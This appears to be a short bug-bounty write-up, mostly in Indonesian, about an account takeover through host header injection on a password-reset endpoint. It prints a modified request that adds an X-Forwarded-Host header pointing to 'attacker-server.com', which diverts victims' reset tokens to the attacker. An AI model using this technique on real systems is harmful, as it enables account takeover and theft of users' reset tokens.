How I Found Account take over via (“Host header injection Bypass”)

skysenz.medium.com · Skysenz · 10 days ago · research
quality 7/10 · good
0 net
Tags
bug-bounty writeup
How I Found Account take over via ("Host header injection Bypass") | by Skysenz - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original How I Found Account take over via ("Host header injection Bypass") Summary Skysenz Follow ~1 min read · March 24, 2026 (Updated: March 24, 2026) · Free: Yes Summary Gua nemu celah di fitur "Forgot Password" target Intinya gua bisa nipu server biar dia ngirim link reset password ke domain punya gua sendiri bukan ke domain asli mereka Hasilnya Gua bisa dapet token buat ganti password user lain Step-by-Step Cek Target Pas lagi iseng ngetes fitur forgot password , gua coba intercept request-nya pake Burp Suite Ulik Header Gua liat ada request POST /api/password-reset Di sini gua coba tambahin atau modif header X-Forwarded-Host Request awal: Host: target.com Request modifan: HTTP POST /api/password-reset HTTP/1.1 Host: target.com Tambahkan: X-Forwarded-Host: attacker-server.com ... tambahan {"email": "[email protected]"} 3. Liat Hasilnya ternyata servernya "polos" banget. Dia ngebangun link reset password-nya pake nilai dari X-Forwarded-Host tadi 4. The Takeover si korban dapet email resmi dari target.com , tapi tombol "Reset Password"-nya malah ngarah ke https://attacker-server.com/reset?token=xyz123 5. Dapet Token Pas korban ngeklik link itu si token bakal kecatat di log server gua. Tinggal ambil tokennya terus pake di link asli target.com buat ganti password si korban Boom account taken over Impact ini high menurut gw hehehe . Penyerang cuma butuh email korban buat masuk ke akun mereka tanpa perlu tau password lama itu saja sharing wu gua kali ini see u in next write ups!!! byeeee! #cybersecurity #bug-bounty Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).
← Back to stories